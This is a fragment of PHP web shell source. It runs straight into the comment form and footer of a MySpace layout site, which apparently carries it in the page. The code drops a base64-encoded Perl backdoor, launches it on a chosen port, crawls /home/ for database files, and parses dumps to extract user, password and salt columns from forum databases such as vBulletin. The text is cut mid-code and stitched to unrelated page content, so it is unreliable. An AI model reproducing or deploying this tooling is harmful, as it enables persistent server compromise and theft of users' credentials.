"; } else { @$fh=fopen("shbd.pl","w"); @fwrite($fh,base64_decode($backdoor_perl)); @fclose($fh); execmd("perl shbd.pl $_POST[port]",$disable); echo "Server backdoor'd
"; } } function sql_rep_search($dir) { global $self; $ext=array(".db",".sql"); @$dh=opendir($dir); while((@$file=readdir($dh))) { $ex=strrchr($file,'.'); if(in_array($ex,$ext)&&$file!="Thumbs.db"&&$file!="thumbs.db") echo "
$dir"."$file
"; if(is_dir($dir.$file)&&$file!='..'&&$file!='.') { if(!preg_match("/\/public_html\//",$dir)) sql_rep_search($dir.$file.'/public_html/'); else sql_rep_search($dir.$file); } } @closedir($dh); } function database_tools() { if(isset($_POST['sql_start_search'])) { echo "
"; sql_rep_search("/home/"); echo "
Databases
"; } $colarr=array(); if(isset($_POST['db_parse'])) { if(!is_file($_FILES['db_upath']['tmp_name'])&&empty($_POST['db_dpath'])) die("Please specify a DB to parse..."); $db_meth=empty($_POST['db_dpath'])?'uploaded':'path'; $q_delimit=$_POST['q_delimit']; if(isset($_POST['column_defined'])) { switch($_POST['column_type']) { case 'SMF': break; case 'phpbb': break; case 'vbulletin': $colarr=array(4,5,7,48); break; } } else { $strr=str_replace(", ",",",trim($_POST['db_columns'])); $colarr=explode(",",$strr); } switch($db_meth) { case 'uploaded': @$fh=fopen($_FILES['db_upath']['tmp_name'],'r') or die("Failed to open file for reading"); break; case 'path': @$fh=fopen($_POST['db_dpath'],'r') or die("Failed to open file for reading"); break; } echo "Parsing database contents...
"; while(!feof($fh)) { $c_line=fgets($fh); $strr=str_replace(", ",",",$c_line); $arr=explode(',',$strr); for($i=0;$i"; } continue; } @fclose($fh); } echo "
Database parser
Quote delimiter (usually ` or '): Columns to retrieve (separate by commas):
Use predefined column match (user+pass+salt):
Path to DB dump:
Upload DB dump:

Fi

Post a comment
Name:*
Friend ID:
Comment:*
Verification:*   4652wapb
 
 

Help | Contact | Advertise | Bookmark! | Home | 101 online

Copyright © 2007-2008 Candy Adds. All rights reserved. Candy Adds is not affiliated with MySpace.
Layout design by Kiwi Love.